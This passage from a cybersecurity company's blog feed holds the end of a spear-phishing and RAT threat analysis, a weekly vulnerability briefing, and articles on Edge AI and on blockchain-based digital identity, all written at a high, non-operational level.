  • After this initial phase, the file will either be launched in a temporary folder or replicated so that its payload can be started. RATs usually perform, at some point in their execution, an injection into a legitimate process or processes related to .NET, the technology in which these malware families are usually written.
  • Depending on the version and who is using it, it will add Anti-Analysis techniques to prevent the sample from being debugged or executed in Sandbox, which will make the analyst’s work more difficult
  • As is usual in this type of malware, they create tasks or logs to persist in the system, so that even if the computer is shut down, the process is restarted again in order to maintain communication with the C&C
  • After this, it would communicate outwards sending basic information about the infected computer and wait for the attacker’s orders

Conclusion

These Spear-Phishing techniques will continue to evolve and all their versions will continue to be used at all times, as they are all still effective, the human factor is always the weakest and the groups that use these techniques know this.

As mentioned, these are not just disorganised teams, in many cases they are orchestrated actors, who use certain types of malware with a great capacity to obtain information on infrastructure, users, credentials that can expose an entire organisation using the same entry point, a simple e-mail.

Featured photo: Brett Jordan / Unsplash

Aarón Jornet
Aarón Jornet

Security researcher, focused on malware reverse engineering and threat analysis, dedicated to locate and hunt groups, campaigns, threats and malwares in Telefonica Tech Threat Hunting department.

Cyber Security Weekly Briefing, 8 – 14 April

Telefónica Tech    14 April, 2023

Apple fixes two new actively exploited 0-day vulnerabilities

Apple has released new security advisories about two new actively exploited 0-day vulnerabilities affecting iPhones, Macs and iPads.

  • First, there is the security flaw registered as CVE-2023-28206, which is an out-of-bounds write to IOSurfaceAccelerator that could trigger data corruption, a crash or code execution.
  • Secondly, the vulnerability assigned as CVE-2023-28205 is a use of WebKit that could allow data corruption or arbitrary code execution by reusing freed memory to create specially crafted malicious web pages controlled by threat actors.

Apple recommends updating the software on affected devices to fix the two 0-day vulnerabilities in iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1 and Safari 16.4.1 versions.

More info

* * *

Microsoft Patch Tuesday includes an actively exploited 0-day vulnerability

In its latest security update, Microsoft has fixed a total of 98 vulnerabilities affecting several of its products, including Microsoft Windows, Office and Edge.

These include an actively exploited 0-day vulnerability which has been registered as CVE-2023-28252, CVSSv3 of 7.8 according to the manufacturer. It is a CLFS flaw that could be exploited locally by malicious actors with the purpose of obtaining SYSTEM privileges.

The rest of the critical security flaws, which have been registered as CVE-2023-28311CVE-2023-21554 and CVE-2023-28231CVE-2023-28219CVE-2023-28220CVE-2023-28250CVE-2023-28291 should also be mentioned.

The last vulnerabilities CVE-2023-28285, CVE-2023-28295, CVE-2023-28287 and CVE-2023-28311, although less critical than the rest, are worth mentioning and although they are not being actively exploited, they could be easily exploited by opening malicious documents sent in possible future phishing campaigns..

More info

* * *

Quadreams accused of using spyware against political figures and journalists

Researchers from CitizenLab and Microsoft‘s Threat Intelligence team have published an investigation into the Israeli company QuaDreams, which they accuse of using spyware against journalists and political figures.

The company’s activity is allegedly based on the sale and distribution of a platform called Reign to government entities, described by Microsoft as a set of exploits, malware and infrastructure designed to exfiltrate information from mobile devices.

Of the techniques used to operate it, researchers suspect it is a zero-click exploit for iOS devices, which they have named ENDOFDAYS, that would make use of invisible iCloud invitations.

Analysis has identified at least five victims, who currently remain anonymous, in North America, Central Asia, Southeast Asia, Europe and the Middle East.

More info

* * *

Android security bulletin for April

Android has released its security bulletin for the month of April, where it fixes a total of 68 vulnerabilities. 

Among the vulnerabilities, the most important ones are two detected in the System component, which have been catalogued as CVE-2023-21085 and CVE-2023-21096, both with critical severity, and which could allow a possible attacker to perform a remote code execution (RCE) without the need for additional execution privileges. 

In addition, four vulnerabilities in Qualcomm’s closed source component have also been listed as critical: CVE-2022-33231, CVE-2022-33288, CVE-2022-33289 and CVE-2022-33302. 

Finally, a vulnerability in the Arm Mali GPU kernel driver, CVE-2022-38181 CVSSv3 8.8, has also been fixed which is reported to have been actively exploited.

More info

* * *

Azure design flaw allows account takeover

An Orca investigation has exposed a design flaw in Microsoft Azure Shared Key that would allow an attacker to gain access to Microsoft Storage accounts. Although Orca has published a proof of concept demonstrating how to steal access tokens from higher privileged identities, move laterally, access critical business assets and execute remote code execution (RCE), Microsoft’s Security Response Center has deemed the issue a design flaw and not a vulnerability, so it is unable to provide a security update and will have to wait for a redesign of Azure.

In the meantime, it is recommended to remove shared key authorisation from Azure and instead adopt Azure Active Directory authentication as a mitigation strategy.

More info

Edge AI: Artificial Intelligence outside Cloud

Nacho Palou    13 April, 2023

Edge AI refers to the execution of AI algorithms near or on devices such as wearables, mobiles, cameras, IoT (Internet of Things) sensors or edge servers, which the ability to analyse and process data. In real-time and without depending on a server on the internet.

In contrast, the use of Artificial Intelligence in Cloud (Cloud AI) requires sending data to a data center or Cloud platform where they are stored and processed. It usually requires a permanent, robust, and capable connection.

Edge AI is therefore closely related to Edge Computing. Both concepts refer to processing and analysing data at the edge of the network. That is, processing takes place in close proximity to or even on the very devices that generate the data. With Edge AI, response times are shortened, and efficiency and security are improved when executing Artificial Intelligence models on Edge devices.

Edge AI features

In order for Edge AI to be possible, analytical models and AI algorithms must be able to run on local servers or on devices equipped with processors with a certain computational capacity, as described in the article Edge Computing and Machine Learning, a strategic alliance.

However, Edge AI devices often have limitations in terms of computing power, memory, and storage space for data. Also, autonomy if they run on a battery, depending on the case.

This limitation may require optimizing algorithms and, depending on their purpose, using specialized hardware.

  • Optimising algorithms by applying techniques such as reducing the complexity of models, quantifying parameters, or eliminating unnecessary connections in the neural network (pruning) to speed up its operation. Also, using of specific architectures for low-power devices.
  • Specialised hardware that makes use of specific processors for AI applications, such as computer vision and neural network inference processors. AI-focused ASIC (Application-Specific Integrated Circuit) chips, such as the IBM AIU processor, offer high performance and low latency compared to general purpose processors or CPUs.

Security is also a critical aspect for Edge AI devices. Processing and analysing data on a local device reduces the risk of data exposure. But Edge AI devices are also vulnerable and equally exposed to cyber threats and attacks.

The use of Edge AI can also have privacy implications for users, depending on their function. Therefore, Edge AI must implement mechanisms for encryption, authentication, anomaly detection and privacy management.

Latency and Edge Computing: Why is it important?

Differences between Edge AI and Cloud AI

As mentioned above, the main difference between Cloud AI and Edge AI is in where the algorithms runs:

  • In Cloud AI, data storage and processing happens on conventional, centralised Cloud servers, often managed by a Cloud provider.
  • In Edge AI, data and algorithms are stored and run on hardware peripheral to the network; from wearables to vehicles to IoT devices to Edge servers, such as Snowball de AWS.

This difference means that each approach has its advantages and disadvantages as we will see more in a future post, but they can be briefly summarised as follows:

Cloud AI

  • Advantages: it usually has a greater capacity and computing power, which allows it to process and analyse large amounts of data. As a cloud platform, the power and capacity can be scaled up or down as needed.
  • Disadvantages: The need to transfer data can cause speed, security and regulatory, data residency or privacy issues. Physical distance of hundreds or thousands of kilometres or network congestion can slow communications and increase data exposure.

Edge AI

  • Advantages: requires less bandwidth and has almost imperceptible latency. It offers immediate response and increased data security, but also has an impact on users’ privacy. It can operate in remote areas or isolated environments without connectivity.
  • Disadvantages: As mentioned above, limited computing power and memory can reduce the types and complexity of AI models they can run. The need to optimise algorithms and use specific hardware can increase development and deployment costs.

Edge AI applications

Edge AI can be applied in a variety of sectors. Some of the most obvious applications include security surveillance, voice assistants, Smart Industry or wearables. Some use cases would be:

  • Security cameras with machine vision capabilities that analyse image content in real time to identify suspicious objects or people, events or behaviour.
  • Voice assistants learn to recognise speech locally to detect when to activate or to respond to simple instructions.
  • In Smart Industry, where sensors or vision systems monitor the quality of production or logistics processes or products, such as the demo we showed together with AWS at MWC.
  • Wearables and medical devices, such as heart rate or glucose monitors, to analyse patient data in real time and alert on any anomaly.

Edge AI can also be applied to driver assistance systems (ADAS). Or in autonomous cars, to process data captured by vehicle sensors, such as cameras or accelerometers, to detect and respond to traffic conditions.

Conclusion

Edge AI is a suitable approach in cases where data needs to be analysed and processed and an immediate response is required. Without delay due to latency or insufficient connectivity or bandwidth, while maintaining data privacy and security with the right implementation.

Edge AI is still in its infancy with the continuous improvement of processing and storage capabilities in IoT devices and new developments in AI-specific hardware, such as AIU processors, Edge AI is still in its early evolutions.

The combination of Edge AI and next-generation connectivity, such as 5G and LPWA or NB-IoT via satellite, will accelerate innovation and has the potential to extend the reach of AI-enabled solutions to a wider range of industries and regions.

More articles in this series:

Featured photo: Luke Chesser / Unsplash. Apple Watch is an example of an Edge AI (consumer) device capable of processing data and executing AI models locally.

Blockchain reinvents Digital Identity

María Teresa Nieto Galán    12 April, 2023

The concept of Digital Identity has become increasingly important in our lives as the boundaries between real life and digital life blurred. As a result, and to the same extent that we digitize our multiple “selves”, we become aware of the associated inconveniences of the process.

We all complain about repeating our data every time we register for a service. Or the difficulty of managing multiple identities simultaneously and in isolation. We are also aware of the need to take control of the personal data we provide about ourselves, the risk of data breaches this poses, or giving away more data than necessary.

Digital Identity and Blockchain

We have repeatedly heard that Blockchain is the ideal technology to reinvent digital identity as we know it. It can also solve or minimize the difficulties mentioned. By means of a decentralized and immutable registration mechanism, such as Blockchain, it would be much simpler to authenticate and verify what we know as digital identity while also preserving the user’s privacy.

Using Blockchain it would be much simpler to authenticate and verify digital identity, while also preserving the user’s privacy.

In addition, to solve the famous problem of repeating the same data in all registration processes and not knowing where or to whom we are giving it, with this technology, as everything is always shared, it would be possible to reuse the same data from an identity and provide traceability and transparency every time a user shares part or all of their data with an entity. However, this always starts with the requirement that companies that want to use our data are on the same Blockchain network.

Digital Identity, Privacy and Blockchain —Can They All Be In The Same Equation?

Sovereign digital identity, or recentralization vs. decentralization

Based on these premises, many companies have bet on reinventing digital identity with Blockchain technology. There are currently several solutions available on the market, both proprietary and open-source solutions, such as uPort or Sovrin. All of them create a completely decentralized ecosystem where the concept of Sovereign Digital Identity is implemented.

However, each solution is specific to a platform. In other words, we are once again creating multiple, isolated digital identity applications that cannot interoperate despite being decentralized.

From a technological point of view, this fragmentation is also reflected when developing applications based on Blockchain technology. Every time we want to work with these networks, whether they are public like Bitcoin or Ethereum or private like those based on Hyperledger Fabric, we have to create a specific identity to operate on them.

It is increasingly necessary to create interoperability mechanisms that allow us to create a single digital identity. This identity, while being decentralized, can operate with different technologies and applications.

If we also add the need for a multi-platform system that has some authentication mechanism and is easy to monetize, the decentralization trend turns around and becoming the opposite: recentralization.

For this reason, it is increasingly necessary to create interoperability mechanisms that allow us to create a single identity that is truly decentralized (i.e., without a single issuing entity that creates, maintains, validates, and guarantees it) and capable of operating with the different technologies and applications available in the market. In these cases, native decentralization is limited, and we need to decentralize the decentralized and make it interoperable.

What is a (truly) Decentralized Identity?

Just as in the original Blockchain networks, trust is placed in the network as a whole, composed of its members, and not in any specific relationship between them. The same should be true for identity. For example, let’s consider a bond issuance on a Blockchain network that involves three banks.

Why do we have to create a user account on that specific network created for that purpose to operate? If we join the network, what meaning does the identity created for us by the administrators (the three banks collectively) have for operating on that network? Why couldn’t we operate with those bonds without having to participate in the network?

What would be desirable is for each network to be able to offer me its services without knowing me. Or, in other words, to present myself to that network anonymously but with credentials that allow me to identify and verify my identity on any occasion.

An example of providing a service to “verified” strangers

It is somewhat similar to what telecommunications networks do when one of our subscribers visits another country and connects to a different mobile network while roaming. The visitor (roamer) is unknown to the visited network, which does not know who the owner of that mobile line is.

But instead of giving them a new identity, it uses the identity verified by their home network and provides them with service, even though it does not know who they are or what their data is (name, surname, or account number to bill them).

In this way, it would be possible to offer our customers digital identities that are not dependent on a single platform, service, or issuer, but on several. And also provide them with a much simpler and easier-to-manage user experience. Likewise, it would be possible to ensure that identity is not tied to a single decentralized access point or a single specific set of organizations or entities.

Hyperledger Besu: blockchain technology on the rise in the business environment

Identity in Blockchain networks

For all these reasons, interoperability between Blockchain networks, understood as the ability to operate with the same identity on various networks, is a necessary mechanism for the creation of a true decentralized identity.

However, it is not enough for an identity issued on one network by one organization to be accepted by another entity on another network. True interoperability will exist when unknown networks trust each other when verifying a user’s credentials and allow them to operate without any prior agreement, integration, or interconnection between them.

True interoperability will exist when unknown networks trust each other when verifying a user’s credentials

Thanks to these relationships of trust, which we could call implicit, we would significantly streamline the processes of provision and onboarding in business processes.

For example, we could create a Blockchain network to manage the supply chain without provisioning or registering suppliers in it. These would begin to operate without registering, but by sending transactions signed with their identity previously validated or issued in other sectoral, geographical, or functional networks.

Requirements could also be imposed for operation based on their solvency through credentials issued in a network where such attributes are managed. Or if they have a legal entity with a tax address in a specific region, accepting digital certificates issued for legal entities by the administration.

At Telefónica Tech, we have experience developing this type of solution in the TrustID project, released as open source through a project in Hyperledger Labs.

Featured photo: Vadim Bogulov / Unsplash